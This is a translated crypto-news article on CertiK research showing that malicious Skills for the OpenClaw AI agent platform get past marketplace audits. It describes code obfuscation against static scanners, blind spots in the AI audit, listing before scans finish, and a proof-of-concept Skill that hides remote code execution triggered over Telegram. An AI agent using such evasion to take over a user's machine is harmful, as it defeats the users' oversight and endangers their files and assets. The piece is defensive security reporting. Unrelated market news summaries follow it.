Is Your "OpenClaw" Running Naked? CertiK Test: How Vulnerable OpenClaw Skill Bypasses Audits, Takes Over Computers Without Authorization

marsbitPublished on 2026-03-17Last updated on 2026-03-17

Abstract

OpenClaw, a popular open-source, self-hosted AI agent platform, has experienced rapid growth due to its flexibility and extensibility. Its ecosystem relies heavily on third-party “Skills” from the Clawhub marketplace, which can perform high-risk operations like system automation and crypto wallet transactions. However, security firm CertiK has identified critical vulnerabilities in the platform’s security model. CertiK’s research reveals that OpenClaw’s current security—primarily dependent on pre-publishing scans like VirusTotal, static code analysis, and AI logic checks—is fundamentally flawed. These measures can be easily bypassed through simple code obfuscation, and malicious Skills can be published even before scanning is complete. In a proof-of-concept, CertiK developed a seemingly benign Skill that contained a hidden remote code execution vulnerability. It passed all checks without warnings and, once installed, allowed full system control via a remote command. The core issue is not a specific bug but a industry-wide misconception: over-reliance on scanning instead of runtime isolation. Unlike systems like iOS, which enforce strict sandboxing, OpenClaw’s sandbox is optional and often disabled for functionality, leaving systems exposed. CertiK recommends that OpenClaw enforce mandatory sandboxing and granular permission controls for Skills. Users are advised to deploy OpenClaw on isolated devices and avoid exposing sensitive data or assets until stronger isolation is i...

Recently, the open-source self-hosted AI agent platform OpenClaw (colloquially known as "小龙虾" or "Little Crayfish") has rapidly gained popularity due to its flexible scalability and self-controlled deployment features, becoming a phenomenon in the personal AI agent space. Its core ecosystem, Clawhub, serves as an app marketplace, gathering a vast number of third-party Skill plugins that enable agents to unlock advanced capabilities with one click—from web search and content creation to encrypted wallet operations, on-chain interactions, and system automation—leading to explosive growth in both ecosystem scale and user base.

But for these third-party Skills running in high-privilege environments, where exactly are the platform's true security boundaries?

Recently, CertiK, the world's largest Web3 security company, released new research on Skill security. The report points out that the current market has a misperception of the security boundaries of AI agent ecosystems: the industry generally treats "Skill scanning" as the core security boundary, but this mechanism is almost useless against hacker attacks.

If OpenClaw is compared to an operating system for smart devices, Skills are the various APPs installed on the system. Unlike ordinary consumer-grade APPs, some Skills in OpenClaw run in high-privilege environments, directly accessing local files, calling system tools, connecting to external services, executing host environment commands, and even operating users' encrypted digital assets. Once security issues arise, they can directly lead to serious consequences such as sensitive information leakage, remote device takeover, and theft of digital assets.

The current universal security solution for third-party Skills across the industry is "pre-listing scanning and auditing." OpenClaw's Clawhub has also built a three-layer audit protection system: integrating VirusTotal code scanning, static code detection engines, and AI logic consistency checks, pushing security alerts to users through risk classification in an attempt to safeguard ecosystem security. However, CertiK's research and proof-of-concept attack tests confirm that this detection system has shortcomings in real attack and defense scenarios and cannot bear the core responsibility of security protection.

The research first breaks down the inherent limitations of the existing detection mechanisms:

Static detection rules are easily bypassed. The core of this engine relies on matching code features to identify risks, such as flagging the combination of "reading sensitive environmental information + sending network requests" as high-risk behavior. However, attackers only need to make slight syntactic modifications to the code to completely bypass feature matching while fully retaining malicious logic, akin to rephrasing dangerous content in synonymous terms, rendering the security scanner completely ineffective.

AI auditing has inherent detection blind spots. The core positioning of Clawhub's AI audit is a "logic consistency detector," which can only catch obvious malicious code where "declared functionality does not match actual behavior," but is helpless against exploitable vulnerabilities hidden within normal business logic, much like how it's difficult to find fatal traps buried deep in the clauses of a seemingly compliant contract.

More critically, the audit process has underlying design flaws: even when VirusTotal scan results are still in a "pending" state, Skills that have not completed the full "health check" process can be directly listed publicly, and users can install them without any warnings, leaving an opening for attackers.

To verify the real危害性 (harmfulness) of the risk, the CertiK research team completed a full test. The team developed a Skill named "test-web-searcher," which表面上 (superficially) appears to be a fully compliant web search tool with code logic that完全符合 (fully complies with)常规开发规范 (standard development norms), but actually implants a remote code execution vulnerability within the normal functional flow.

This Skill bypassed the detection of the static engine and AI audit, and was installed normally without any security warnings while the VirusTotal scan was still pending;最终 (Finally), by remotely sending an instruction via Telegram, the vulnerability was successfully triggered, achieving arbitrary command execution on the host device (in the demo, it directly controlled the system to launch the calculator).

CertiK clearly stated in the research that these issues are not unique product bugs of OpenClaw, but rather a common cognitive error across the entire AI agent industry: the industry普遍把 (generally treats) "audit scanning" as the core security防线 (defense line), but忽略了 (neglects) the true security foundation, which is runtime强制隔离 (mandatory isolation) and精细化的权限管控 (fine-grained permission control). This is就像 (just like) how the security core of Apple's iOS ecosystem has never been the strict review of the App Store, but rather the system's mandatory sandbox mechanism and fine-grained permission control, which allows each APP to run only in its dedicated "隔离舱" (isolation compartment), unable to arbitrarily obtain system permissions. However, OpenClaw's existing sandbox mechanism is optional rather than mandatory and highly relies on manual user configuration. The vast majority of users, to ensure Skill functionality and availability, choose to disable the sandbox, ultimately leaving the agent in a "裸奔" (running naked) state. Once a Skill with vulnerabilities or malicious code is installed, it can directly lead to catastrophic consequences.

Regarding the issues discovered, CertiK also provided security guidance:

● For developers of AI agents like OpenClaw, sandbox isolation must be set as the default mandatory configuration for third-party Skills, with a fine-grained permission control model for Skills, absolutely不允许 (not allowing) third-party code to inherit the host machine's high privileges by default.

● For ordinary users, Skills labeled "Safe" in the Skill marketplace merely indicate that no risks were detected, not that they are absolutely safe. Before the official implementation of underlying strong isolation mechanisms as the default configuration, it is recommended to deploy OpenClaw on non-critical idle devices or virtual machines, and never let it near sensitive files, password credentials, or high-value加密资产 (encrypted assets).

The AI agent赛道 (track) is currently on the eve of an explosion, and the speed of ecosystem expansion must not outpace the pace of security construction. Audit scanning can only block初级 (basic) malicious attacks but can never become the security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and containing damage," and by mandating isolation boundaries from the runtime底层 (bottom layer), can the security bottom line of AI agents truly be upheld, allowing this technological transformation to proceed steadily and go the distance.

Related Questions

QWhat is the main security vulnerability identified by CertiK in the OpenClaw platform's Skill ecosystem?

AThe main vulnerability is the industry's misplaced reliance on pre-upload 'scanning and auditing' as the core security boundary. This system is easily bypassed, and the platform lacks a mandatory, default sandbox isolation and fine-grained permission control model for third-party Skills, leaving high-permission environments exposed.

QHow did CertiK's proof-of-concept Skill, 'test-web-searcher', demonstrate the security flaw?

AThe 'test-web-searcher' Skill, which appeared to be a compliant web search tool, contained a hidden remote code execution vulnerability. It bypassed all static and AI auditing checks, was installed without any security warnings, and was triggered via a remote Telegram command to execute arbitrary code on the host machine (e.g., launching the system calculator).

QWhat are the two key limitations of OpenClaw's current three-layer audit protection system (Clawhub) as outlined in the research?

A1. Static detection rules can be easily bypassed through minor syntactic changes to the code that preserve the malicious logic. 2. The AI audit has a fundamental blind spot; it can only detect a mismatch between declared and actual function but is ineffective against hidden vulnerabilities embedded within normal business logic.

QWhat core security principle does CertiK recommend that OpenClaw and similar AI agent platforms adopt, drawing a comparison to Apple's iOS?

ACertiK recommends adopting a mandatory sandbox isolation mechanism and a fine-grained permission control model as the default setting for third-party Skills. This is analogous to the iOS security model, where apps run in a enforced 'sandbox' and are strictly permission-controlled, rather than relying primarily on App Store review.

QWhat practical safety advice does the article give to ordinary users of OpenClaw until stronger security measures are implemented?

AUsers are advised not to trust the 'safe' label on Skills as it only means no risks were detected, not that it is absolutely safe. They should deploy OpenClaw on non-critical, idle devices or within a virtual machine, keeping it away from sensitive files, password credentials, and high-value crypto assets.

Related Reads

$9.4 Billion: The Largest Robotics Funding This Year Has Emerged

Munich-based humanoid robotics company Neura has completed a $1.4 billion (approximately RMB 94.9 billion) Series C funding round, valuing the company at around $7 billion and positioning it among the global leaders in the sector. The investment round is notable not just for its size—reportedly the largest in robotics this year—but also for its strategic backers, which include tech giants like NVIDIA and Amazon, alongside established industrial players such as German engineering firms Bosch and Schaeffler. This mix of investors signals a significant shift in the industry's focus from technological demonstrations and general-purpose narratives toward practical, industrial deployment and commercialization. Neura's approach centers on developing humanoid robots for defined, high-value industrial tasks rather than pursuing a general-purpose model. Its early validation comes from a partnership with BMW, where its robots are being tested on actual production lines. The involvement of Bosch and Schaeffler, companies deeply embedded in global manufacturing, underscores a growing belief that humanoid robots are transitioning from labs to viable factory-floor solutions. The article highlights two converging trends driving investment: advancements in AI and large language models, which enhance robots' perception and decision-making in unstructured environments, and mounting pressure from labor shortages and rising costs in major manufacturing regions. The funding landscape is now bifurcating between companies like Figure AI, focusing on versatile general-purpose robots, and firms like Neura, targeting specific vertical industrial applications with clearer, shorter paths to ROI. While technical hurdles remain, the core challenges for widespread adoption are increasingly seen as engineering and commercial in nature: managing the high integration and customization costs for different factory environments and establishing robust, localized maintenance and service networks. The record investment in Neura, particularly from industrial capital, indicates the industry's growing confidence in moving from proving feasibility to solving the practical problems of scalability, reliability, and building sustainable business models around humanoid robots in real-world settings like automotive manufacturing and hazardous labor environments.

marsbit1h ago

$9.4 Billion: The Largest Robotics Funding This Year Has Emerged

marsbit1h ago

Coinbase And Ethena Launch High Yield USDC Vault Powered By Morpho

Coinbase has launched a new High Yield USDC Vault in collaboration with Ethena Labs and powered by Morpho, curated by Steakhouse Financial. This marks the first live product from the Coinbase-Ethena partnership, offering Coinbase users access to enhanced yields through a simplified interface. Unlike Coinbase's more conservative vaults, this product accepts a broader collateral mix, including synthetic assets like Ethena's USDe, which allows for higher potential returns but introduces greater risks related to collateral behavior and market dynamics. The annual percentage yields (APYs) are dynamic and not guaranteed. The launch underscores a trend of centralized exchanges packaging complex DeFi strategies into user-friendly products, expanding access while highlighting the need for clear risk disclosure. The vault is currently available to eligible users in the U.S. (excluding New York) and select international markets.

bitcoinist4h ago

Coinbase And Ethena Launch High Yield USDC Vault Powered By Morpho

bitcoinist4h ago

Anthropic Pre-IPO Market Falls After US Directive Forces Model Shutdown

The U.S. government directed Anthropic to globally suspend access to its Claude Fable 5 and Claude Mythos 5 AI models for all foreign nationals, citing national security concerns. The emergency export control order followed reports of a non-universal jailbreak vulnerability. Anthropic pushed back, arguing the government provided only verbal evidence of a narrow prompt technique to find minor, known software flaws, and warned that applying such a standard broadly could halt new model deployments across the frontier AI industry. The directive impacted Anthropic's pre-IPO market valuation, with a key perpetual contract falling 3.7%. This highlights how AI regulation is becoming a tradable event, as crypto-linked instruments allow rapid speculation on regulatory news. The incident underscores the integration of AI infrastructure into speculative markets, where valuations can react instantly to government actions, often faster than public evidence emerges.

bitcoinist6h ago

Anthropic Pre-IPO Market Falls After US Directive Forces Model Shutdown

bitcoinist6h ago

Exploit Wallet Converts Stolen Tokens Into 18,510 ETH And 1,548 BNB

An exploit-linked wallet has reportedly converted stolen assets into 18,510 ETH (approximately $30.83 million) and 1,548 BNB ($924,000). According to on-chain tracking data cited by WuBlockchain and Lookonchain, the attacker sold compromised "H tokens" to obtain these more liquid assets and still holds an additional 111.36 million H tokens worth about $14 million. This conversion into major cryptocurrencies like ETH and BNB is a common step after an exploit, as attackers move from illiquid, traceable tokens toward deeper, more liquid assets. This consolidation can signal potential next steps, such as moving funds through bridges or mixers, and complicates recovery efforts for security teams. While blockchain analysis provides real-time visibility into such transactions, the identity of the wallet controller often remains uncertain. The data serves as a valuable snapshot of fund movement, highlighting the role of on-chain monitors in tracking security incidents before official investigations are complete.

bitcoinist9h ago

Exploit Wallet Converts Stolen Tokens Into 18,510 ETH And 1,548 BNB

bitcoinist9h ago

"119 to 176 Dollars": Behind SpaceX's Listing, MSX Once Again Successfully Executes the Pre-IPO Closed Loop

Following May's 300% gain on Cerebras, MSX delivered another outstanding performance during SpaceX's listing night. On June 12, SpaceX (SPCX) launched on Nasdaq, reaching a high of $176. This marked the successful culmination of MSX's Pre-IPO project launched in March, where users subscribed at $119, achieving gains of approximately 40-48%. This event validated MSX's complete Pre-IPO mechanism, a crucial advantage in a market where access to top-tier private company equity is typically limited to institutions. MSX's model provides a full cycle for users: subscription (at $119 for SpaceX), real-time on-chain portfolio tracking, optional early redemption, seamless conversion to tradable spot assets (SPCX.M) upon IPO, and final settlement in stablecoins. This end-to-end process distinguishes MSX from platforms that faced settlement issues during the SpaceX IPO, highlighting that the core challenge of Pre-IPO is not just access, but a clear exit and conversion path post-listing. This success with SpaceX is MSX's second major Pre-IPO verification, following the Cerebras listing in May, which yielded ~300% returns for early participants. These back-to-back achievements demonstrate MSX's capability to source, structure, and deliver real assets through a replicable on-chain model. The true barrier for Pre-IPO products lies not in providing an entry point, but in ensuring reliable fulfillment from subscription through to post-IPO liquidity. MSX's proven闭环 (closed-loop) process addresses this, offering Web3 users a structured way to access high-growth, pre-public companies in sectors like AI and frontier tech. MSX plans to continue expanding its Pre-IPO portfolio with this focus on authenticity, transparency, and post-listing execution.

Odaily星球日报13h ago

"119 to 176 Dollars": Behind SpaceX's Listing, MSX Once Again Successfully Executes the Pre-IPO Closed Loop

Odaily星球日报13h ago

Trading

Spot

Futures

活动图片